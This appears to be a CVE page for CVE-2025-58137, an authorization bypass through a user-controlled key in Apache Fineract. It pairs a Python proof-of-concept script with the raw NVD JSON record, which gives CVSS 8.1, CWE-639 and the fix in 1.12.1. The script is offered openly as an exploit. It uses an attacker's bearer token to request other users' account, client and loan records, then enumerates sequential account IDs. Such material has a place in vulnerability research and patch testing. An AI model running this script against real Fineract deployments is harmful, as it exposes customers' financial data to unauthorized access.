CVE-2025-58137

import requests # CVE-2025-58137 PoC - Apache Fineract Authorization Bypass # Target: Apache Fineract <= 1.11.0 # Attack: Bypass authorization via user-controlled key TARGET_URL = "http://target-server:8443/api/v1" ATTACKER_TOKEN = "attacker_auth_token_here" def exploit_authorization_bypass(): """ Exploit authorization bypass via user-controlled key parameter. Replace RESOURCE_ID with target victim's resource ID. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Identify user-controlled key parameter # Common parameters: id, resourceId, userId, accountId # Step 2: Attempt to access victim's resource by manipulating ID victim_resource_id = "VICTIM_RESOURCE_ID" # Example: Access another user's account details endpoints = [ f"{TARGET_URL}/accounts/{victim_resource_id}", f"{TARGET_URL}/clients/{victim_resource_id}", f"{TARGET_URL}/loans/{victim_resource_id}" ] for endpoint in endpoints: response = requests.get(endpoint, headers=headers) if response.status_code == 200: print(f"[SUCCESS] Unauthorized access to: {endpoint}") print(f"Response: {response.json()}") elif response.status_code == 403: print(f"[BLOCKED] Access denied to: {endpoint}") # Step 3: Test IDOR with sequential or predictable IDs for i in range(1, 100): test_endpoint = f"{TARGET_URL}/accounts/{i}" response = requests.get(test_endpoint, headers=headers) if response.status_code == 200: print(f"[VULNERABLE] Accessible resource ID: {i}") exploit_authorization_bypass()

{"cve": {"id": "CVE-2025-58137", "sourceIdentifier": "[email protected]", "published": "2025-12-12T10:15:49.370", "lastModified": "2025-12-18T14:55:12.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Apache Fineract.\n\nThis issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1.\n\nUsers are encouraged to upgrade to version 1.13.0, the latest release."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:fineract:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.1", "matchCriteriaId": "D0E0C1ED-CEE5-4A99-956F-B85A27C3E51E"}]}]}], "references": [{"url": "https://lists.apache.org/thread/gz3zhoghlclch3rdnzyrdcf69c0507ww", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/11/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}